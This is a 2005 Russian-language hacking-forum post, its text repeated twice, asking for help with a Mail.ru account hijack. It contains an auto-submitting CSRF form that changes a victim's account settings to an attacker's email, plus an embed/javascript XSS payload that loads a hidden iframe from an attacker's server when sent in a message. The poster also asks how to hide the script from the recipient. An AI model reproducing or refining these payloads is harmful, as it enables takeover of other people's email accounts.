BARMALEY
21.05.2005, 16:58
Здравствуйте!
Помогите разобраться со взломом майл.ру описанным в этой статье http://antichat.ru/txt/hmail/ !!!
Сделал я HTML:
<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="hacker@antichat.ru">
<input type="hidden" value="Сохранить" name="Save">
</form>
<script>
document.anketa.submit();
</script>
Выложил его на сервак,потом кидаем мудаку этот скрипт:
<embed src="javascript:status=location;document.getElementById('xxx'). innerHTML='<iframe src=http://адрес документа/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>
Когда отсылаю письмо то вместо ('xxx') в письме появляется ('xxx :) Как с этим бороться???И как сделать что бы адресат не видел этого скрипта??? И для чего нужен этот URL:http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru.
Зарание благодарен за ответы грамотных людей!!!
Помогите разобраться со взломом майл.ру описанным в этой статье http://antichat.ru/txt/hmail/ !!!
Сделал я HTML:
<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="hacker@antichat.ru">
<input type="hidden" value="Сохранить" name="Save">
</form>
<script>
document.anketa.submit();
</script>
Выложил его на сервак,потом кидаем мудаку этот скрипт:
<embed src="javascript:status=location;document.getElementById('xxx'). innerHTML='<iframe src=http://адрес документа/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>
Когда отсылаю письмо то вместо ('xxx') в письме появляется ('xxx :) Как с этим бороться???И как сделать что бы адресат не видел этого скрипта??? И для чего нужен этот URL:http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru.
Зарание благодарен за ответы грамотных людей!!!